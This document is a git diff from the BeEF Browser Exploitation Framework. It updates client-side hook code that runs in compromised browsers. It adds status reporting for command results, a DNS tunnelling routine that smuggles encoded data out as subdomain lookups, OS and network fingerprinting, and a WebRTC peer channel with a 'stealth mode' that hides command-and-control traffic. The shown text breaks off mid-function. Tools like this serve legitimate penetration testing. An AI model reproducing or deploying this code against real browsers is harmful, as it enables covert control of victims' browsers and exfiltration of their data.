-            console.error('beef.mitb.poisonAnchor - failed to execute: ' + e.message);
+            beef.debug('beef.mitb.poisonAnchor - failed to execute: ' + e.message);
        }
        return false;
    },
@@ -219,4 +219,4 @@ beef.mitb = {
    }
 };

-beef.regCmp('beef.mitb');
+beef.regCmp('beef.mitb');
--- a/core/main/client/net.js
+++ b/core/main/client/net.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
@@ -35,6 +35,7 @@ beef.net = {
    command: function () {
        this.cid = null;
        this.results = null;
+        this.status = null;
        this.handler = null;
        this.callback = null;
    },
@@ -84,13 +85,15 @@ beef.net = {
     * @param: {String} handler: the server-side handler that will be called
     * @param: {Integer} cid: command id
     * @param: {String} results: the data to send
+     * @param: {Integer} status: the result of the command execution (-1, 0 or 1 for 'error', 'unknown' or 'success')
     * @param: {Function} callback: the function to call after execution
     */
-    queue: function (handler, cid, results, callback) {
+    queue: function (handler, cid, results, status, callback) {
        if (typeof(handler) === 'string' && typeof(cid) === 'number' && (callback === undefined || typeof(callback) === 'function')) {
            var s = new beef.net.command();
            s.cid = cid;
            s.results = beef.net.clean(results);
+            s.status = status;
            s.callback = callback;
            s.handler = handler;
            this.cmd_queue.push(s);
@@ -105,22 +108,32 @@ beef.net = {
     * @param: {String} handler: the server-side handler that will be called
     * @param: {Integer} cid: command id
     * @param: {String} results: the data to send
+     * @param: {Integer} exec_status: the result of the command execution (-1, 0 or 1 for 'error', 'unknown' or 'success')
     * @param: {Function} callback: the function to call after execution
+     * @return: {Integer} exec_status: the command module execution status (defaults to 0 - 'unknown' if status is null)
     */
-    send: function (handler, cid, results, callback) {
+    send: function (handler, cid, results, exec_status, callback) {
+        // defaults to 'unknown' execution status if no parameter is provided, otherwise set the status
+        var status = 0;
+        if (exec_status != null && parseInt(Number(exec_status)) == exec_status){ status = exec_status}
+
        if (typeof beef.websocket === "undefined" || (handler === "/init" && cid == 0)) {
-            this.queue(handler, cid, results, callback);
+            this.queue(handler, cid, results, status, callback);
            this.flush();
        } else {
            try {
                beef.websocket.send('{"handler" : "' + handler + '", "cid" :"' + cid +
                    '", "result":"' + beef.encode.base64.encode(beef.encode.json.stringify(results)) +
-                    '","callback": "' + callback + '","bh":"' + beef.session.get_hook_session_id() + '" }');
+                    '", "status": "' + exec_status +
+                    '", "callback": "' + callback +
+                    '","bh":"' + beef.session.get_hook_session_id() + '" }');
            } catch (e) {
-                this.queue(handler, cid, results, callback);
+                this.queue(handler, cid, results, status, callback);
                this.flush();
            }
        }
+
+        return status;
    },

    /**
@@ -257,6 +270,7 @@ beef.net = {
                response.status_code = jqXHR.status;
                response.status_text = textStatus;
                response.duration = (end_time - start_time);
+                response.port_status = "open";
            },
            complete: function (jqXHR, textStatus) {
                response.status_code = jqXHR.status;
@@ -273,7 +287,7 @@ beef.net = {
                    response.port_status = "open";
                }
            }
-        }).done(function () {
+        }).always(function () {
                if (callback != null) {
                    callback(response);
                }
@@ -287,6 +301,10 @@ beef.net = {
     *  - allowCrossDomain: set cross-domain requests as allowed or blocked
     *
     * forge_request is used mainly by the Requester and Tunneling Proxy Extensions.
+     * Example usage:
+     * beef.net.forge_request("http", "POST", "172.20.40.50", 8080, "/lulz",
+     *   true, null, { foo: "bar" }, 5, 'html', false, null, function(response) {
+     *   alert(response.response_body)})
     */
    forge_request: function (scheme, method, domain, port, path, anchor, headers, data, timeout, dataType, allowCrossDomain, requestid, callback) {

@@ -362,6 +380,8 @@ beef.net = {
                }
            },

+            data: data,
+
            // http server responded successfully
            success: function (data, textStatus, xhr) {
                var end_time = new Date().getTime();
--- a/core/main/client/net/connection.js
+++ b/core/main/client/net/connection.js
@@ -0,0 +1,47 @@
+//
+// Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+// beef.net.connection - wraps Mozilla's Network Information API
+// https://developer.mozilla.org/en-US/docs/Web/API/NetworkInformation
+// https://developer.mozilla.org/en-US/docs/Web/API/Navigator/connection
+beef.net.connection = {
+
+  /* Returns the connection type
+   * @example: beef.net.connection.type()
+   * @note: https://developer.mozilla.org/en-US/docs/Web/API/NetworkInformation/type
+   * @return: {String} connection type or 'unknown'.
+   **/
+  type: function () {
+    try {
+      var connection = navigator.connection || navigator.mozConnection || navigator.webkitConnection;
+      var type = connection.type;
+      if (/^[a-z]+$/.test(type)) return type; else return 'unknown';
+    } catch(e) {
+      beef.debug("Error retrieving connection type: " + e.message);
+      return 'unknown';
+    }
+  },
+
+  /* Returns the maximum downlink speed of the connection
+   * @example: beef.net.connection.downlinkMax()
+   * @note: https://developer.mozilla.org/en-US/docs/Web/API/NetworkInformation/downlinkMax
+   * @return: {String} downlink max or 'unknown'.
+   **/
+  downlinkMax: function () {
+    try {
+      var connection = navigator.connection || navigator.mozConnection || navigator.webkitConnection;
+      var max = connection.downlinkMax;
+      if (max) return max; else return 'unknown';
+    } catch(e) {
+      beef.debug("Error retrieving connection downlink max: " + e.message);
+      return 'unknown';
+    }
+  }
+
+};
+
+beef.regCmp('beef.net.connection');
+
--- a/core/main/client/net/dns.js
+++ b/core/main/client/net/dns.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
@@ -18,49 +18,67 @@ beef.net.dns = {

 	handler: "dns",

-	send: function(msgId, messageString, domain, wait, callback) {
+	send: function(msgId, data, domain, callback) {

-		var dom = document.createElement('b');
+        var encode_data = function(str) {
+            var result="";
+            for(i=0;i<str.length;++i) {
+                result+=str.charCodeAt(i).toString(16).toUpperCase();
+            }
+            return result;
+        };

-		// DNS settings
-		var max_domain_length = 255-5-5-5-5-5;
-		var max_segment_length = max_domain_length - domain.length;
+        var encodedData = encodeURI(encode_data(data));

-		// splits strings into chunks
-		String.prototype.chunk = function(n) {
-			if (typeof n=='undefined') n=100;
-			return this.match(RegExp('.{1,'+n+'}','g'));
-		};
+        beef.debug(encodedData);
+        beef.debug("_encodedData_ length: " + encodedData.length);

-		// XORs a string
-		xor_encrypt = function(str, key) {
-			var result="";
-			for(i=0;i<str.length;++i) {
-				result+=String.fromCharCode(key^str.charCodeAt(i));
-			}
-			return result;
-		};
+        // limitations to DNS according to RFC 1035:
+        // o Domain names must only consist of a-z, A-Z, 0-9, hyphen (-) and fullstop (.) characters
+        // o Domain names are limited to 255 characters in length (including dots)
+        // o The name space has a maximum depth of 127 levels (ie, maximum 127 subdomains)
+        // o Subdomains are limited to 63 characters in length (including the trailing dot)

-		// sends a DNS request
-		sendQuery = function(query) {
-			beef.debug("Requesting: "+query);
-			var img = new Image;
-			img.src = "http://"+query;
-			img.onload = function() { dom.removeChild(this); }
-			img.onerror = function() { dom.removeChild(this); }
-			dom.appendChild(img);
-		};
+        // DNS request structure:
+        // COMMAND_ID.SEQ_NUM.SEQ_TOT.DATA.DOMAIN
+      //max_length: 3.   3   .   3   . 63 . x

-		// encode message
-		var xor_key = Math.floor(Math.random()*99000+1000);
-		encoded_message = encodeURI(xor_encrypt(messageString, xor_key)).replace(/%/g,".");
+        // only max_data_segment_length is currently used to split data into chunks. and only 1 chunk is used per request.
+        // for optimal performance, use the following vars and use the whole available space (which needs changes server-side too)
+        var reserved_seq_length = 3 + 3 + 3 + 3; // consider also 3 dots
+        var max_domain_length = 255 - reserved_seq_length; //leave some space for sequence numbers
+        var max_data_segment_length = 63; // by RFC

-		// Split message into segments
-		segments = encoded_message.chunk(max_segment_length)
-		for (seq=1; seq<=segments.length; seq++) {
-			// send segment
-			sendQuery(msgId+"."+seq+"."+segments.length+"."+xor_key+segments[seq-1]+"."+domain);
-		}
+        beef.debug("max_data_segment_length: " + max_data_segment_length);
+
+        var dom = document.createElement('b');
+
+        String.prototype.chunk = function(n) {
+            if (typeof n=='undefined') n=100;
+            return this.match(RegExp('.{1,'+n+'}','g'));
+        };
+
+        var sendQuery = function(query) {
+            var img = new Image;
+            //img.src = "http://"+query;
+            img.src = beef.net.httpproto + "://" + query; // prevents issues with mixed content
+            img.onload = function() { dom.removeChild(this); }
+            img.onerror = function() { dom.removeChild(this); }
+            dom.appendChild(img);
+
+            //experimental
+            //setTimeout(function(){dom.removeChild(img)},1000);
+        };
+
+        var segments = encodedData.chunk(max_data_segment_length);
+
+        var ident = "0xb3"; //see extensions/dns/dns.rb, useful to explicitly mark the DNS request as a tunnel request
+
+        beef.debug(segments.length);
+
+        for (var seq=1; seq<=segments.length; seq++) {
+            sendQuery(ident + msgId + "." + seq + "." + segments.length + "." + segments[seq-1] + "." + domain);
+        }

 		// callback - returns the number of queries sent
 		if (!!callback) callback(segments.length);
--- a/core/main/client/net/local.js
+++ b/core/main/client/net/local.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
--- a/core/main/client/net/portscanner.js
+++ b/core/main/client/net/portscanner.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
--- a/core/main/client/net/requester.js
+++ b/core/main/client/net/requester.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
@@ -21,8 +21,8 @@ beef.net.requester = {
 	send: function(requests_array) {
        for(var i=0; i<requests_array.length; i++){
            request = requests_array[i];
-
-            beef.net.forge_request('http', request.method, request.host, request.port, request.uri, null, request.headers, request.data, 10, null, request.allowCrossDomain, request.id,
+            if (request.proto == 'https') var scheme = 'https'; else var scheme = 'http';
+            beef.net.forge_request(scheme, request.method, request.host, request.port, request.uri, null, request.headers, request.data, 10, null, request.allowCrossDomain, request.id,
                                       function(res, requestid) { beef.net.send('/requester', requestid, {
                                           response_data: res.response_body,
                                           response_status_code: res.status_code,
--- a/core/main/client/os.js
+++ b/core/main/client/os.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
@@ -14,18 +14,23 @@ beef.os = {
 	  * http://ha.ckers.org/blog/20070319/detecting-default-browser-in-ie/
 	  */
 	getDefaultBrowser: function() {
-		var mt = document.mimeType;
 		var result = "Unknown"
-		if (mt) {
-			if (mt == "Safari Document")       result = "Safari";
-			if (mt == "Firefox HTML Document") result = "Firefox";
-			if (mt == "Chrome HTML Document")  result = "Chrome";
-			if (mt == "HTML Document")         result = "Internet Explorer";
-			if (mt == "Opera Web Document")    result = "Opera";
+		try {
+			var mt = document.mimeType;
+			if (mt) {
+				if (mt == "Safari Document")       result = "Safari";
+				if (mt == "Firefox HTML Document") result = "Firefox";
+				if (mt == "Chrome HTML Document")  result = "Chrome";
+				if (mt == "HTML Document")         result = "Internet Explorer";
+				if (mt == "Opera Web Document")    result = "Opera";
+			}
+		} catch (e) {
+			beef.debug("[os] getDefaultBrowser: "+e.message);
 		}
 		return result;
 	},

+	// the likelihood that we hook Windows 3.11 (which has only Win in the UA string) is zero in 2015
 	isWin311: function() {
 		return (this.ua.match('(Win16)')) ? true : false;
 	},
@@ -75,6 +80,10 @@ beef.os = {

 	isWin8: function() {
 		return (this.ua.match('(Windows NT 6.2)')) ? true : false;
+	},	
+	
+	isWin81: function() {
+		return (this.ua.match('(Windows NT 6.3)')) ? true : false;
 	},
 	
 	isOpenBSD: function() {
@@ -93,6 +102,19 @@ beef.os = {
 		return (this.ua.match('(Mac_PowerPC)|(Macintosh)|(MacIntel)')) ? true : false;
 	},

+	isOsxYosemite: function(){ // TODO
+		return (this.ua.match('(OS X 10_10)|(OS X 10.10)')) ? true : false;
+	},
+	isOsxMavericks: function(){ // TODO
+		return (this.ua.match('(OS X 10_9)|(OS X 10.9)')) ? true : false;
+	},
+	isOsxSnowLeopard: function(){ // TODO
+		return (this.ua.match('(OS X 10_8)|(OS X 10.8)')) ? true : false;
+	},
+	isOsxLeopard: function(){ // TODO
+		return (this.ua.match('(OS X 10_7)|(OS X 10.7)')) ? true : false;
+	},
+
 	isWinPhone: function() {
 		return (this.ua.match('(Windows Phone)')) ? true : false;
 	},
@@ -134,33 +156,24 @@ beef.os = {
 	},

 	isWindows: function() {
-		return this.isWin311() || this.isWinNT4() || this.isWinCE() || this.isWin95() || this.isWin98() || this.isWinME() || this.isWin2000() || this.isWin2000SP1() || this.isWinXP() || this.isWinServer2003() || this.isWinVista() || this.isWin7() || this.isWin8() || this.isWinPhone();
+		return (this.ua.match('Windows')) ? true : false;
 	},
 	
 	getName: function() {
-		//Windows
-		if(this.isWin311())        return 'Windows 3.11';
-		if(this.isWinNT4())        return 'Windows NT 4';
-		if(this.isWinCE())         return 'Windows CE';
-		if(this.isWin95())         return 'Windows 95';
-		if(this.isWin98())         return 'Windows 98';
-		if(this.isWinME())         return 'Windows Millenium';
-		if(this.isWin2000())       return 'Windows 2000';
-		if(this.isWin2000SP1())    return 'Windows 2000 SP1';
-		if(this.isWinXP())         return 'Windows XP';
-		if(this.isWinServer2003()) return 'Windows Server 2003';
-		if(this.isWinVista())      return 'Windows Vista';
-		if(this.isWin7())          return 'Windows 7';
-		if(this.isWin8())          return 'Windows 8';
+		
+		if(this.isWindows()){
+			return 'Windows';
+		}
+
+		if(this.isMacintosh()) {
+			return 'OSX';
+		}

 		//Nokia
 		if(this.isNokia()) {
-
 			if (this.ua.indexOf('Maemo Browser') != -1) return 'Maemo';
 			if (this.ua.match('(SymbianOS)|(Symbian OS)')) return 'SymbianOS';
 			if (this.ua.indexOf('Symbian') != -1) return 'Symbian';
-
-			//return 'Nokia';
 		}

 		// BlackBerry
@@ -169,9 +182,11 @@ beef.os = {
 		// Android
 		if(this.isAndroid()) return 'Android';

-		//linux
+		// SunOS
+		if(this.isSunOS()) return 'SunOS';
+
+		//Linux
 		if(this.isLinux()) return 'Linux';
-		if(this.isSunOS()) return 'Sun OS';

 		//iPhone
 		if (this.isIphone()) return 'iOS';
@@ -179,17 +194,6 @@ beef.os = {
 		if (this.isIpad()) return 'iOS';
 		//iPod
 		if (this.isIpod()) return 'iOS';
-
-		// zune
-		//if (this.isZune()) return 'Zune';
-		
-		//macintosh
-		if(this.isMacintosh()) {
-			if((typeof navigator.oscpu != 'undefined') && (navigator.oscpu.indexOf('Mac OS')!=-1))
-				return navigator.oscpu;
-				
-			return 'Macintosh';
-		}
 		
 		//others
 		if(this.isQNX()) return 'QNX';
@@ -197,6 +201,36 @@ beef.os = {
 		if(this.isWebOS()) return 'webOS';
 		
 		return 'unknown';
+	},
+
+	getVersion: function(){
+		//Windows
+		if(this.isWindows()) {
+			if (this.isWin81())         return '8.1';
+			if (this.isWin8())          return '8';
+			if (this.isWin7())          return '7';
+			if (this.isWinVista())      return 'Vista';
+			if (this.isWinXP())         return 'XP';
+			if (this.isWinServer2003()) return 'Server 2003';
+			if (this.isWin2000SP1())    return '2000 SP1';
+			if (this.isWin2000())       return '2000';
+			if (this.isWinME())         return 'Millenium';
+
+			if (this.isWinNT4())        return 'NT 4';
+			if (this.isWinCE())         return 'CE';
+			if (this.isWin95())         return '95';
+			if (this.isWin98())         return '98';
+		}
+
+		// OS X
+		if(this.isMacintosh()) {
+			if (this.isOsxYosemite())        return '10.10';
+			if (this.isOsxMavericks())       return '10.9';
+			if (this.isOsxSnowLeopard())     return '10.8';
+			if (this.isOsxLeopard())         return '10.7';
+		}
+
+		// TODO add Android/iOS version detection
 	}
 };

--- a/core/main/client/session.js
+++ b/core/main/client/session.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
--- a/core/main/client/timeout.js
+++ b/core/main/client/timeout.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
@@ -14,4 +14,4 @@
 Cheers to John Wilander that discussed this bug with me at OWASP AppSec Research Greece
 antisnatchor
 */
-setTimeout(beef_init, 1000);
+//setTimeout(beef_init, 1000);
--- a/core/main/client/updater.js
+++ b/core/main/client/updater.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
@@ -79,7 +79,7 @@ beef.updater = {
 			try {
 				command();
 			} catch(e) {
-				console.error('execute_commands - command failed to execute: ' + e.message);
+				beef.debug('execute_commands - command failed to execute: ' + e.message);
                // prints the command source to be executed, to better trace errors
                // beef.client_debug must be enabled in the main config
                beef.debug(command.toString());
--- a/core/main/client/webrtc.js
+++ b/core/main/client/webrtc.js
@@ -0,0 +1,609 @@
+//
+// Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+
+/**
+ * @Literal object: beef.webrtc
+ *
+ * Manage the WebRTC peer to peer communication channels.
+ * This objects contains all the necessary client-side WebRTC components,
+ * allowing browsers to use WebRTC to communicate with each other.
+ * To provide signaling, the WebRTC extension sets up custom listeners.
+ *  /rtcsignal - for sending RTC signalling information between peers
+ *  /rtcmessage - for client-side rtc messages to be submitted back into beef and logged.
+ *
+ * To ensure signaling gets back to the peers, the hook.js dynamic construction also includes
+ * the signalling.
+ *
+ * This is all mostly a Proof of Concept
+ */
+
+beefrtcs = {}; // To handle multiple peers - we need to have a hash of Beefwebrtc objects
+               // The key is the peer id
+globalrtc = {}; // To handle multiple Peers - we have to have a global hash of RTCPeerConnection objects
+                // these objects persist outside of everything else 
+                // The key is the peer id
+rtcstealth = false; // stealth should only be initiated from one peer - this global variable will contain:
+                    // false - i.e not stealthed; or
+                    // <peerid> - i.e. the id of the browser which initiated stealth mode
+rtcrecvchan = {}; // To handle multiple event channels - we need to have a global hash of these
+                  // The key is the peer id
+
+// Beefwebrtc object - wraps everything together for a peer connection
+// One of these per peer connection, and will be stored in the beefrtc global hash
+function Beefwebrtc(initiator,peer,turnjson,stunservers,verbparam) {
+    this.verbose = typeof verbparam !== 'undefined' ? verbparam : false; // whether this object is verbose or not
+    this.initiator = typeof initiator !== 'undefined' ? initiator : 0; // if 1 - this is the caller; if 0 - this is the receiver
+    this.peerid = typeof peer !== 'undefined' ? peer : null; // id of this rtc peer
+    this.turnjson = turnjson; // set of TURN servers in the format:
+                              // {"username": "<username", "password": "<password>", "uris": [
+                              //    "turn:<ip>:<port>?transport=<udp/tcp>",
+                              //    "turn:<ip>:<port>?transport=<udp/tcp>"]}
+    this.started = false; // Has signaling / dialing started for this peer
+    this.gotanswer = false; // For the caller - this determines whether they have received an SDP answer from the receiver
+    this.turnDone = false; // does the pcConfig have TURN servers added to it?
+    this.signalingReady = false; // the initiator (Caller) is always ready to signal. So this sets to true during init
+                                 // the receiver will set this to true once it receives an SDP 'offer'
+    this.msgQueue = []; // because the handling of SDP signals may happen in any order - we need a queue for them
+    this.pcConfig = null; // We set this during init
+    this.pcConstraints = {"optional": [{"googImprovedWifiBwe": true}]} // PeerConnection constraints
+    this.offerConstraints = {"optional": [], "mandatory": {}}; // Default SDP Offer Constraints - used in the caller
+    this.sdpConstraints = {'optional': [{'RtpDataChannels':true}]}; // Default SDP Constraints - used by caller and receiver
+    this.gatheredIceCandidateTypes = { Local: {}, Remote: {} }; // ICE Candidates
+    this.allgood = false; // Is this object / peer connection with the nominated peer ready to go?
+    this.dataChannel = null; // The data channel used by this peer
+    this.stunservers = stunservers; // set of STUN servers, in the format:
+                                    // ["stun:stun.l.google.com:19302","stun:stun1.l.google.com:19302"]
+}
+
+// Initialize the object
+Beefwebrtc.prototype.initialize = function() {
+  if (this.peerid == null) {
+    return 0; // no peerid - NO DICE
+  }
+
+  // Initialise the pcConfig hash with the provided stunservers
+  var stuns = JSON.parse(this.stunservers);
+  this.pcConfig = {"iceServers": [{"urls":stuns, "username":"user",
+    "credential":"pass"}]};
+
+  // We're not getting the browsers to request their own TURN servers, we're specifying them through BeEF
+  // this.forceTurn(this.turnjson);
+  this.turnDone = true;
+
+  // Caller is always ready to create peerConnection.
+  this.signalingReady = this.initiator;
+
+  // Start .. maybe 
+  this.maybeStart();
+
+  // If the window is closed, send a signal to beef .. this is not all that great, so just commenting out
+  // window.onbeforeunload = function() {
+  //   this.sendSignalMsg({type: 'bye'});
+  // }
+
+  return 1; // because .. yeah .. we had a peerid - this is good yar.
+}
+
+//Forces the TURN configuration (we can't query that computeengine thing because it's CORS is restrictive)
+//These values are now simply passed in from the config.yaml for the webrtc extension
+Beefwebrtc.prototype.forceTurn = function(jason) {
+    var turnServer = JSON.parse(jason);
+    var iceServers = createIceServers(turnServer.uris,
+                                      turnServer.username,
+                                      turnServer.password);
+    if (iceServers !== null) {
+        this.pcConfig.iceServers = this.pcConfig.iceServers.concat(iceServers);
+    }
+    beef.debug("Got TURN servers, will try and maybestart again..");
+    this.turnDone = true;
+    this.maybeStart();
+}
+
+// Try and establish the RTC connection
+Beefwebrtc.prototype.createPeerConnection = function() {
+  beef.debug('Creating RTCPeerConnnection with the following options:\n' +
+            '  config: \'' + JSON.stringify(this.pcConfig) + '\';\n' +
+            '  constraints: \'' + JSON.stringify(this.pcConstraints) + '\'.');
+  try {
+    // Create an RTCPeerConnection via the polyfill (webrtcadapter.js).
+    globalrtc[this.peerid] = new RTCPeerConnection(this.pcConfig, this.pcConstraints);
+    globalrtc[this.peerid].onicecandidate = this.onIceCandidate;
+    beef.debug('Created RTCPeerConnnection with the following options:\n' +
+              '  config: \'' + JSON.stringify(this.pcConfig) + '\';\n' +
+              '  constraints: \'' + JSON.stringify(this.pcConstraints) + '\'.');
+    
+  } catch (e) {
+    beef.debug('Failed to create PeerConnection, exception: ');
+    beef.debug(e);
+    return;
+  }
+
+  // Assign event handlers to signalstatechange, iceconnectionstatechange, datachannel etc
+  globalrtc[this.peerid].onsignalingstatechange = this.onSignalingStateChanged;
+  globalrtc[this.peerid].oniceconnectionstatechange = this.onIceConnectionStateChanged;
+  globalrtc[this.peerid].ondatachannel = this.onDataChannel;
+  this.dataChannel = globalrtc[this.peerid].createDataChannel("sendDataChannel", {reliable:false});
+}
+
+// When the PeerConnection receives a new ICE Candidate
+Beefwebrtc.prototype.onIceCandidate = function(event) {
+  var peerid = null;
+
+  for (var k in beefrtcs) {
+    if (beefrtcs[k].allgood === false) {
+      peerid = beefrtcs[k].peerid;
+    }
+  }
+
+  beef.debug("Handling onicecandidate event while connecting to peer: " + peerid + ". Event received:");
+  beef.debug(event);
+
+  if (event.candidate) {
+    // Send the candidate to the peer via the BeEF signalling channel
+    beefrtcs[peerid].sendSignalMsg({type: 'candidate',
+                 label: event.candidate.sdpMLineIndex,
+                 id: event.candidate.sdpMid,
+                 candidate: event.candidate.candidate});
+    // Note this ICE candidate locally
+    beefrtcs[peerid].noteIceCandidate("Local", beefrtcs[peerid].iceCandidateType(event.candidate.candidate));
+  } else {
+    beef.debug('End of candidates.');
+  }
+}
+
+// For all rtc signalling messages we receive as part of hook.js polling - we have to process them with this function
+// This will either add messages to the msgQueue and try and kick off maybeStart - or it'll call processSignalingMessage
+// against the message directly
+Beefwebrtc.prototype.processMessage = function(message) {
+  beef.debug('Signalling Message - S->C: ' + JSON.stringify(message));
+  var msg = JSON.parse(message);
+
+  if (!this.initiator && !this.started) { // We are currently the receiver AND we have NOT YET received an SDP Offer
+    beef.debug('processing the message, as a receiver');
+    if (msg.type === 'offer') { // This IS an SDP Offer
+      beef.debug('.. and the message is an offer .. ');
+      this.msgQueue.unshift(msg); // put it on the top of the msgqueue
+      this.signalingReady = true; // As the receiver, we've now got an SDP Offer, so lets set signalingReady to true
+      this.maybeStart(); // Lets try and start again - this will end up with calleeStart() getting executed
+    } else { // This is NOT an SDP Offer - as the receiver, just add it to the queue
+      beef.debug(' .. the message is NOT an offer .. ');
+      this.msgQueue.push(msg);
+    }
+  } else if (this.initiator && !this.gotanswer) { // We are currently the caller AND we have NOT YET received the SDP Answer
+    beef.debug('processing the message, as the sender, no answers yet');
+    if (msg.type === 'answer') { // This IS an SDP Answer
+        beef.debug('.. and we have an answer ..');
+        this.processSignalingMessage(msg); // Process the message directly
+        this.gotanswer = true; // We have now received an answer
+        //process all other queued message...
+        while (this.msgQueue.length > 0) {
+            this.processSignalingMessage(this.msgQueue.shift());
+        }
+    } else { // This is NOT an SDP Answer - as the caller, just add it to the queue
+        beef.debug('.. not an answer ..');
+        this.msgQueue.push(msg);
+    }
+  } else { // For all other messages just drop them in the queue
+    beef.debug('processing a message, but, not as a receiver, OR, the rtc is already up');
+    this.processSignalingMessage(msg);
+  } 
+}
+
+// Send a signalling message .. 
+Beefwebrtc.prototype.sendSignalMsg = function(message) {
+  var msgString = JSON.stringify(message);
+  beef.debug('Signalling Message - C->S: ' + msgString);
+  beef.net.send('/rtcsignal',0,{targetbeefid: this.peerid, signal: msgString});
+}
+
+// Used to record ICS candidates locally
+Beefwebrtc.prototype.noteIceCandidate = function(location, type) {
+  if (this.gatheredIceCandidateTypes[location][type])
+    return;
+  this.gatheredIceCandidateTypes[location][type] = 1;
+  // updateInfoDiv();
+}
+
+// When the signalling state changes. We don't actually do anything with this except log it.
+Beefwebrtc.prototype.onSignalingStateChanged = function(event) {
+  beef.debug("Signalling has changed to: " + event.target.signalingState);
+}
+
+// When the ICE Connection State changes - this is useful to determine connection statuses with peers.
+Beefwebrtc.prototype.onIceConnectionStateChanged = function(event) {
+  var peerid = null;
+
+  for (k in globalrtc) {
+    if ((globalrtc[k].localDescription.sdp === event.target.localDescription.sdp) && (globalrtc[k].localDescription.type === event.target.localDescription.type)) {
+      peerid = k;
+    }
+  }
+
+  beef.debug("ICE with peer: " + peerid + " has changed to: " + event.target.iceConnectionState);
+
+  // ICE Connection Status has connected - this is good. Normally means the RTCPeerConnection is ready! Although may still look for 
+  // better candidates or connections
+  if (event.target.iceConnectionState === 'connected') {
+    //Send status to peer
+    window.setTimeout(function() {
+        beefrtcs[peerid].sendPeerMsg('ICE Status: '+event.target.iceConnectionState);
+        beefrtcs[peerid].allgood = true;
+        },1000);
+  }
+
+  // Completed is similar to connected. Except, each of the ICE components are good, and no more testing remote candidates is done.
+  if (event.target.iceConnectionState === 'completed') {
+    window.setTimeout(function() {
+      beefrtcs[peerid].sendPeerMsg('ICE Status: '+event.target.iceConnectionState);
+      beefrtcs[peerid].allgood = true;
+    },1000);
+  }
+
+  if ((rtcstealth == peerid) && (event.target.iceConnectionState === 'disconnected')) {
+    //I was in stealth mode, talking back to this peer - but it's gone offline.. come out of stealth
+    rtcstealth = false;
+    beefrtcs[peerid].allgood = false;
+    beef.net.send('/rtcmessage',0,{peerid: peerid, message: peerid + " - has apparently gotten disconnected"});
+  } else if ((rtcstealth == false) && (event.target.iceConnectionState === 'disconnected')) {
+    //I was not in stealth, and this peer has gone offline - send a message
+    beefrtcs[peerid].allgood = false;
+    beef.net.send('/rtcmessage',0,{peerid: peerid, message: peerid + " - has apparently gotten disconnected"});
+  }
+  // We don't handle situations where a stealthed peer loses a peer that is NOT the peer that made it go into stealth
+  // This is possibly a bad idea - @xntrik
+
+
+}
+
+// This is the function when a peer tells us to go into stealth by sending a dataChannel message of "!gostealth"
+Beefwebrtc.prototype.goStealth = function() {
+    //stop the beef updater
+    rtcstealth = this.peerid; // this is a global variable
+    beef.updater.lock = true;
+    this.sendPeerMsg('Going into stealth mode');
+
+    setTimeout(function() {rtcpollPeer()}, beef.updater.xhr_poll_timeout * 5);
+}
+
+// This is the actual poller when in stealth, it is global as well because we're using the setTimeout to execute it
+rtcpollPeer = function() {
+    if (rtcstealth == false) {
+        //my peer has disabled stealth mode
+        beef.updater.lock = false;
+        return;
+    }
+
+    beef.debug('lub dub');
+
+    beefrtcs[rtcstealth].sendPeerMsg('Stayin alive'); // This is the heartbeat we send back to the peer that made us stealth
+
+    setTimeout(function() {rtcpollPeer()}, beef.updater.xhr_poll_timeout * 5);
+}
+
+// When a data channel has been established - within here is the message handling function as well
+Beefwebrtc.prototype.onDataChannel = function(event) {
+  var peerid = null;
+  for (k in globalrtc) {
+    if ((globalrtc[k].localDescription.sdp === event.currentTarget.localDescription.sdp) && (globalrtc[k].localDescription.type === event.currentTarget.localDescription.type)) {
+      peerid = k;
+    }
+  }
+
+  beef.debug("Peer: " + peerid + " has just handled the onDataChannel event");
